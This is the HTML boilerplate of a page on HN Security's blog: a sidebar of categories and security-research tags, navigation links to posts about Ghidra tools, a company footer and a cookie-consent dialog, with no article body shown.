							<div id="first-home wow animated fadeIn" role="complementary">
					<h1"><section id="categories-3" class="widget widget_categories"><h2 class="widget-title">Blog Categories</h2>
			<ul>
					<li class="cat-item cat-item-9"><a href="https://security.humanativaspa.it/category/articles/">Articles</a>
</li>
	<li class="cat-item cat-item-10"><a href="https://security.humanativaspa.it/category/events/">Events</a>
</li>
	<li class="cat-item cat-item-13"><a href="https://security.humanativaspa.it/category/exploits/">Exploits</a>
</li>
	<li class="cat-item cat-item-1"><a href="https://security.humanativaspa.it/category/news/">News</a>
</li>
	<li class="cat-item cat-item-34"><a href="https://security.humanativaspa.it/category/servizi/">Servizi</a>
</li>
	<li class="cat-item cat-item-11"><a href="https://security.humanativaspa.it/category/tools/">Tools</a>
</li>
	<li class="cat-item cat-item-12"><a href="https://security.humanativaspa.it/category/vulnerabilities/">Vulnerabilities</a>
</li>
			</ul>

			</section></h1>
				</div>
						</div>

		<!-- TAGS -->

				<div class="tags widget widget_tags">
		<h2 class="widget-title">Tags</h2>
					<a href="https://security.humanativaspa.it/tag/0day/ " rel="tag">0day</a>
					<a href="https://security.humanativaspa.it/tag/advisory/ " rel="tag">advisory</a>
					<a href="https://security.humanativaspa.it/tag/brida/ " rel="tag">brida</a>
					<a href="https://security.humanativaspa.it/tag/burp-suite/ " rel="tag">Burp Suite</a>
					<a href="https://security.humanativaspa.it/tag/cve-2021-22205/ " rel="tag">cve-2021-22205</a>
					<a href="https://security.humanativaspa.it/tag/disassembly/ " rel="tag">disassembly</a>
					<a href="https://security.humanativaspa.it/tag/dynamic-analysis/ " rel="tag">dynamic analysis</a>
					<a href="https://security.humanativaspa.it/tag/exploit/ " rel="tag">exploit</a>
					<a href="https://security.humanativaspa.it/tag/format-string/ " rel="tag">format string</a>
					<a href="https://security.humanativaspa.it/tag/frida/ " rel="tag">frida</a>
					<a href="https://security.humanativaspa.it/tag/ghidra/ " rel="tag">ghidra</a>
					<a href="https://security.humanativaspa.it/tag/ghidra2frida/ " rel="tag">ghidra2frida</a>
					<a href="https://security.humanativaspa.it/tag/gitlab/ " rel="tag">gitlab</a>
					<a href="https://security.humanativaspa.it/tag/golang/ " rel="tag">golang</a>
					<a href="https://security.humanativaspa.it/tag/hn-security/ " rel="tag">hn security</a>
					<a href="https://security.humanativaspa.it/tag/incident-response/ " rel="tag">incident response</a>
					<a href="https://security.humanativaspa.it/tag/infiltrate/ " rel="tag">infiltrate</a>
					<a href="https://security.humanativaspa.it/tag/ios/ " rel="tag">iOS</a>
					<a href="https://security.humanativaspa.it/tag/java/ " rel="tag">Java</a>
					<a href="https://security.humanativaspa.it/tag/java-deserialization-scanner/ " rel="tag">Java Deserialization Scanner</a>
					<a href="https://security.humanativaspa.it/tag/java-serialization/ " rel="tag">Java Serialization</a>
					<a href="https://security.humanativaspa.it/tag/metasploit/ " rel="tag">metasploit</a>
					<a href="https://security.humanativaspa.it/tag/meterpreter/ " rel="tag">meterpreter</a>
					<a href="https://security.humanativaspa.it/tag/mobile/ " rel="tag">mobile</a>
					<a href="https://security.humanativaspa.it/tag/openssh/ " rel="tag">OpenSSH</a>
					<a href="https://security.humanativaspa.it/tag/penetration-test/ " rel="tag">penetration test</a>
					<a href="https://security.humanativaspa.it/tag/phrack/ " rel="tag">Phrack</a>
					<a href="https://security.humanativaspa.it/tag/pseudocode/ " rel="tag">pseudocode</a>
					<a href="https://security.humanativaspa.it/tag/research/ " rel="tag">research</a>
					<a href="https://security.humanativaspa.it/tag/reverse-engineering/ " rel="tag">reverse engineering</a>
					<a href="https://security.humanativaspa.it/tag/reverse-enginnering/ " rel="tag">reverse enginnering</a>
					<a href="https://security.humanativaspa.it/tag/romhack/ " rel="tag">romhack</a>
					<a href="https://security.humanativaspa.it/tag/solaris/ " rel="tag">solaris</a>
					<a href="https://security.humanativaspa.it/tag/sparc/ " rel="tag">sparc</a>
					<a href="https://security.humanativaspa.it/tag/static-analysis/ " rel="tag">static analysis</a>
					<a href="https://security.humanativaspa.it/tag/tactical-exploitation/ " rel="tag">tactical exploitation</a>
					<a href="https://security.humanativaspa.it/tag/windows/ " rel="tag">windows</a>
				</div>

		
		</div>

	</div>
</div>

		<div class="d-flex justify-content-between navigation-post"> 	
			
	<nav class="navigation post-navigation" role="navigation" aria-label="Posts">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="https://security.humanativaspa.it/listinglover-add-pseudocode-to-ghidra-disassembly/" rel="prev"><span class="nav-subtitle">Previous:</span> <span class="nav-title">ListingLover &#8211; Add pseudo-code to Ghidra disassembly</span></a></div><div class="nav-next"><a href="https://security.humanativaspa.it/ghidra2frida-the-new-bridge-between-ghidra-and-frida/" rel="next"><span class="nav-subtitle">Next:</span> <span class="nav-title">ghidra2frida &#8211; The new bridge between Ghidra and Frida</span></a></div></div>
	</nav>	</div>
	</main><!-- #main -->

</div>
</div>
	<div class="mb-5 bg-prefooter"></div>

	<footer id="colophon" class="w-100 p-3 bg-graydark text-white text-white">
		<div class="container">
			<div class="row">
				<div class="col-md-4 col-sm-12 ">
											<div id="header-widget-area" class="mb-2 text-start" role="complementary">
						<section id="text-5" class="widget widget_text">			<div class="textwidget"><h6>Legal and Administrative</h6>
<p>Viale Oceano Pacifico, 66<br />
00144 Rome (Italy)</p>
</div>
		</section>	
						</div>
									</div>
				<div class="col-md-4 col-sm-12 ">
									</div>
				<div class="col-md-4 col-sm-12">
											<div id="header-widget-area" class="mb-2 text-md-end text-sm-start" role="complementary">
						<section id="text-4" class="widget widget_text">			<div class="textwidget"><h6><a href="https://humanativaspa.it" target="_blank" rel="noopener">www.humanativaspa.it</a></h6>
<p>Copyright © 2021 HN Security S.r.l.<br />
<a href="https://humanativaspa.it/en/privacy-policy/" target="_blank" rel="noopener">Privacy Policy</a></p>
</div>
		</section>	
						</div>
									</div>
				
			</div>
		</div>

		<!--div class="site-info">
			<a href="">
							</a>
			<span class="sep"> | </span>
						</div>--><!-- .site-info -->
	</footer><!-- #colophon -->
</div><!-- #page -->

<!--googleoff: all--><div id="cookie-law-info-bar" data-nosnippet="true"><span><div class="cli-bar-container cli-style-v2"><div class="cli-bar-message">We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of ALL the cookies.</div><div class="cli-bar-btn_container"><a role='button' tabindex='0' class="cli_settings_button" style="margin:0px 10px 0px 5px;" >Cookie settings</a><a role='button' tabindex='0' data-cli_action="accept" id="cookie_action_close_header"  class="medium cli-plugin-button cli-plugin-main-button cookie_action_close_header cli_action_button" style="display:inline-block; ">ACCEPT</a></div></div></span></div><div id="cookie-law-info-again" style="display:none;" data-nosnippet="true"><span id="cookie_hdr_showagain">Manage consent</span></div><div class="cli-modal" data-nosnippet="true" id="cliSettingsPopup" tabindex="-1" role="dialog" aria-labelledby="cliSettingsPopup" aria-hidden="true">
  <div class="cli-modal-dialog" role="document">
	<div class="cli-modal-content cli-bar-popup">
	  	<button type="button" class="cli-modal-close" id="cliModalClose">
			<svg class="" viewBox="0 0 24 24"><path d="M19 6.41l-1.41-1.41-5.59 5.59-5.59-5.59-1.41 1.41 5.59 5.59-5.59 5.59 1.41 1.41 5.59-5.59 5.59 5.59 1.41-1.41-5.59-5.59z"></path><path d="M0 0h24v24h-24z" fill="none"></path></svg>
			<span class="wt-cli-sr-only">Close</span>
	  	</button>
	  	<div class="cli-modal-body">
			<div class="cli-container-fluid cli-tab-container">
	<div class="cli-row">
		<div class="cli-col-12 cli-align-items-stretch cli-px-0">
			<div class="cli-privacy-overview">
				<h4>Privacy Overview</h4>				<div class="cli-privacy-content">
					<div class="cli-privacy-content-text">This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.</div>
				</div>
				<a class="cli-privacy-readmore"  aria-label="Show more" tabindex="0" role="button" data-readmore-text="Show more" data-readless-text="Show less"></a>			</div>
		</div>
		<div class="cli-col-12 cli-align-items-stretch cli-px-0 cli-tab-section-container">
												<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="necessary" data-toggle="cli-toggle-tab">
								Necessary							</a>
							<div class="wt-cli-necessary-checkbox">
                        <input type="checkbox" class="cli-user-preference-checkbox"  id="wt-cli-checkbox-necessary" data-id="checkbox-necessary" checked="checked"  />
                        <label class="form-check-label" for="wt-cli-checkbox-necessary">Necessary</label>
                    </div>
                    <span class="cli-necessary-caption">Always Enabled</span> 						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="necessary">
								<div class="wt-cli-cookie-description">
									Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.
<table class="cookielawinfo-row-cat-table cookielawinfo-winter"><thead><tr><th class="cookielawinfo-column-1">Cookie</th><th class="cookielawinfo-column-3">Duration</th><th class="cookielawinfo-column-4">Description</th></tr></thead><tbody><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checbox-analytics</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checbox-functional</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checbox-others</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-necessary</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">cookielawinfo-checkbox-performance</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".</td></tr><tr class="cookielawinfo-row"><td class="cookielawinfo-column-1">viewed_cookie_policy</td><td class="cookielawinfo-column-3">11 months</td><td class="cookielawinfo-column-4">The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.</td></tr></tbody></table>								</div>
							</div>
						</div>
					</div>
																	<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="functional" data-toggle="cli-toggle-tab">
								Functional							</a>
							<div class="cli-switch">
                        <input type="checkbox" id="wt-cli-checkbox-functional" class="cli-user-preference-checkbox"  data-id="checkbox-functional"  />
                        <label for="wt-cli-checkbox-functional" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled"><span class="wt-cli-sr-only">Functional</span></label>
                    </div>						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="functional">
								<div class="wt-cli-cookie-description">
									Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
								</div>
							</div>
						</div>
					</div>
																	<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="performance" data-toggle="cli-toggle-tab">
								Performance							</a>
							<div class="cli-switch">
                        <input type="checkbox" id="wt-cli-checkbox-performance" class="cli-user-preference-checkbox"  data-id="checkbox-performance"  />
                        <label for="wt-cli-checkbox-performance" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled"><span class="wt-cli-sr-only">Performance</span></label>
                    </div>						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="performance">
								<div class="wt-cli-cookie-description">
									Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
								</div>
							</div>
						</div>
					</div>
																	<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="analytics" data-toggle="cli-toggle-tab">
								Analytics							</a>
							<div class="cli-switch">
                        <input type="checkbox" id="wt-cli-checkbox-analytics" class="cli-user-preference-checkbox"  data-id="checkbox-analytics"  />
                        <label for="wt-cli-checkbox-analytics" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled"><span class="wt-cli-sr-only">Analytics</span></label>
                    </div>						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="analytics">
								<div class="wt-cli-cookie-description">
									Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
								</div>
							</div>
						</div>
					</div>
																	<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="advertisement" data-toggle="cli-toggle-tab">
								Advertisement							</a>
							<div class="cli-switch">
                        <input type="checkbox" id="wt-cli-checkbox-advertisement" class="cli-user-preference-checkbox"  data-id="checkbox-advertisement"  />
                        <label for="wt-cli-checkbox-advertisement" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled"><span class="wt-cli-sr-only">Advertisement</span></label>
                    </div>						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="advertisement">
								<div class="wt-cli-cookie-description">
									Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
								</div>
							</div>
						</div>
					</div>
																	<div class="cli-tab-section">
						<div class="cli-tab-header">
							<a role="button" tabindex="0" class="cli-nav-link cli-settings-mobile" data-target="others" data-toggle="cli-toggle-tab">
								Others							</a>
							<div class="cli-switch">
                        <input type="checkbox" id="wt-cli-checkbox-others" class="cli-user-preference-checkbox"  data-id="checkbox-others"  />
                        <label for="wt-cli-checkbox-others" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled"><span class="wt-cli-sr-only">Others</span></label>
                    </div>						</div>
						<div class="cli-tab-content">
							<div class="cli-tab-pane cli-fade" data-id="others">
								<div class="wt-cli-cookie-description">
									Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.
								</div>
							</div>
						</div>
					</div>
										</div>
	</div>
</div>
	  	</div>
	  	<div class="cli-modal-footer">
			<div class="wt-cli-element cli-container-fluid cli-tab-container">
				<div class="cli-row">
					<div class="cli-col-12 cli-align-items-stretch cli-px-0">
						<div class="cli-tab-footer wt-cli-privacy-overview-actions">
						
															<a id="wt-cli-privacy-save-btn" role="button" tabindex="0" data-cli-action="accept" class="wt-cli-privacy-btn cli_setting_save_button wt-cli-privacy-accept-btn cli-btn">SAVE & ACCEPT</a>
													</div>
						
					</div>
				</div>
			</div>
		</div>
	</div>
  </div>
</div>
<div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div>
<div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div>
<!--googleon: all--><link rel='stylesheet' id='cookie-law-info-table-css'  href='https://security.humanativaspa.it/sec/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2.0.6' media='all' />
<script src='https://security.humanativaspa.it/sec/wp-content/plugins/enlighter/cache/enlighterjs.min.js?ver=0A0B0C' id='enlighterjs-js'></script>
<script id='enlighterjs-js-after'>
!function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre.EnlighterJSRAW","inline":"code.EnlighterJSRAW"},"options":{"indent":4,"ampersandCleanup":true,"linehover":true,"rawcodeDbclick":false,"textOverflow":"break","linenumbers":true,"theme":"enlighter","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console);
</script>
<script src='https://security.humanativaspa.it/sec/wp-includes/js/wp-embed.min.js' id='wp-embed-js'></script>

</body>
</html>

<!-- Dynamic page generated in 0.071 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2021-12-24 01:36:31 -->

<!-- super cache -->